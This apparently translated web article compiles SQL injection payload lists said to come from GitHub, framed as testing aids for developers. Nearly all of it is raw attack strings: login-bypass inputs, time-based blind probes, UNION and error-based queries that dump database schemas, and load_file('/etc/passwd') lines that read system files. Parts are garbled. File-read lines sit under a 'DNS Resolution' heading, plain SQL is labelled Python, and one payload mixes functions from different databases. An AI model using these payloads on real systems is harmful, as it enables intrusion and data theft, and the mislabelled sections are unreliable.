📜  SQL injection payload list GitHub - SQL (1)

📅  Last modified: 2023-12-03 15:20:17.461000             🧑  Author: Mango

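SQL Injection Payload Lists on GitHub

SQL injection is a common web attack technique in which malicious SQL statements are supplied as input to read or modify information in a database. To defend against SQL injection, developers can use payloads to test how well their web applications resist it. Below are some commonly used SQL injection payload lists, all of which can be found on GitHub.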

1. SQL Injection Payloads

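This payload list contains a series of commonly used SQL injection payloads, typically used to test for SQL injection vulnerabilities. They can be combined into more complex statements to carry out more complex SQL injection attacks. This payload list can be found on the following GitHub page: SQL Injection Payloads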

# SQL Injection Payloads

- ' OR 1=1--
- " OR 1=1--
- ') OR 1=1--
- ") OR 1=1--
- ' OR '1'='1
- " OR "1"="1
- ') OR ('1'='1
- ") OR ("1"="1
- ' OR 1=1/*
- " OR 1=1/*
- ') OR 1=1/*
- ") OR 1=1/*
- ') OR ('a'='a
- ") OR ("a"="a
- %0a%0b%0c%0d%0e%0f
- SLEEP(5)
- SLEEP(5000)
- IF(1=1, SLEEP(5), NULL)
- IF(1=1, SLEEP(5000), NULL)
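
2. SQL Injection Test Cases

This payload list contains a series of typical SQL injection test cases used to test the security of web applications. This payload list can be found on the following GitHub page: SQL Injection Test Cases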

# SQL Injection Test Cases

- '
- ""
- ''
- ``
- '
  OR 1=1
  #
- "
  OR 1=1
  #
- '
  OR '1'='1
  #
- "
  OR "1"="1
  #
- '
  OR 1=1--
  #
- "
  OR 1=1--
  #
- '
  OR '1'='1'--
  #
- "
  OR "1"="1"--
  #
- '
  OR 1=1#
- "
  OR 1=1#
- '
  OR '1'='1'#
- "
  OR "1"="1"#
- '
  OR a=a#
- "
  OR a=a# 
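
3. SQL Injection Cheat Sheet

This payload list contains a SQL injection cheat sheet covering some common SQL injection attack vectors and techniques. Besides listing payload vectors, it also includes some attack techniques specific to different database types. This payload list can be found on the following GitHub page: SQL Injection Cheat Sheet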

# SQL Injection Cheat Sheet

## Comment

- --
- /* */

## Union-Based Injection

- ORDER BY 1,2,3,4,5,6,7,8 -- -
- UNION SELECT null,null,null,null,null,null,null,null-- -
- UNION SELECT null,null,null,null,null,null,null,null,null-- -

## Boolean-Based Blind Injection

- AND
- OR
- IS
- ||
- NOT

## Time-Based Blind Injection

- SLEEP(5)
- BENCHMARK(5000000,MD5(1))

## Retrieving Data

- SELECT * FROM table_name
- SELECT column_name FROM table_name

## Database Information Gathering

- @@VERSION
- DATABASE()
- SELECT user()

## Error-Based Injection

- ' or 1/0=0 --
- ' or (SELECT CAST(table_name AS NVARCHAR)+CAST(column_name AS NVARCHAR) FROM information_schema.columns) LIKE '%password%' --

## Blind Injection

- SELECT 1 WHERE ISNULL((SELECT TOP 1 table_name FROM information_schema.tables),0) = 0 --
- SELECT 1 WHERE ISNULL((SELECT TOP 1 column_name FROM information_schema.columns),0) = 0 --

## DNS Resolution

- INTO OUTFILE '/etc/passwd' -- -
- union select 1,load_file('/etc/passwd'),3,4 -- -
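
4. Python SQL Injection Payloads

This payload list contains some SQL injection payloads written in Python. They can be used directly in Python or modified as needed. This payload list can be found on the following GitHub page: Python SQL Injection Payloads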

# Python SQL Injection Payloads

## Blind Injection

- '||(SELECT SQL_NO_CACHE SYS_OP_C2C(CHR(94)-1||(SELECT DISTINCT(
SELECT COUNT(*)
FROM INFORMATION_SCHEMA.tables t1 JOIN INFORMATION_SCHEMA.tables t2 JOIN INFORMATION_SCHEMA.tables t3 JOIN INFORMATION_SCHEMA.tables t4
)-- HUNX FROM DUAL)||CHR(94)-1 FROM DUAL)||' ('||'LOL'||')
- ,(SELECT SQL_NO_CACHE CASE WHEN ((SELECT DISTINCT LENGTH(table_name) FROM information_schema.tables WHERE LENGTH(table_name)>0 LIMIT 0,1)=6) THEN sleep(5) ELSE 1/0 END FROM information_schema.tables group by table_name) FROM dual
- ,(SELECT SQL_NO_CACHE CASE WHEN ((SELECT DISTINCT ASCII(substring(table_name, 1, 1)) FROM information_schema.tables WHERE LENGTH(table_name)>0 LIMIT 0,1)=104) THEN sleep(5) ELSE 1/0 END FROM information_schema.tables group by table_name) FROM dual
- ,(SELECT SQL_NO_CACHE CASE WHEN ((SELECT DISTINCT LENGTH(column_name) FROM information_schema.columns WHERE LENGTH(column_name)>0 LIMIT 0,1)=8) THEN sleep(5) ELSE 1/0 END FROM information_schema.columns group by column_name) FROM dual
- ,(SELECT SQL_NO_CACHE CASE WHEN ((SELECT DISTINCT ASCII(substring(column_name, 1, 1)) FROM information_schema.columns WHERE LENGTH(column_name)>0 LIMIT 0,1)=118) THEN sleep(5) ELSE 1/0 END FROM information_schema.columns group by column_name) FROM dual

## Error-Based Injection

- 1 UNION SELECT NULL, CONCAT(table_schema, '.', table_name, '.', column_name) AS cc FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' AND table_schema != 'performance_schema' AND table_schema != 'sys'
- 1 UNION ALL SELECT NULL,CONCAT(CONVERT(column_name CHAR(10000)),0x0a) FROM information_schema.columns WHERE table_name=0x7573657273--
- 1 UNION ALL SELECT database(),version(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'xyz'='xyz
- 1 and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT (SELECT DISTINCT CONCAT(0x0a,CAST(schema_name AS CHAR),0x3c62723e) FROM information_schema.schemata LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- tqJT

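The above are some common SQL injection payload lists that can help developers test the security of their web applications. Note that these payloads are only one part of testing, so developers need to stay vigilant and use other payloads to test their applications.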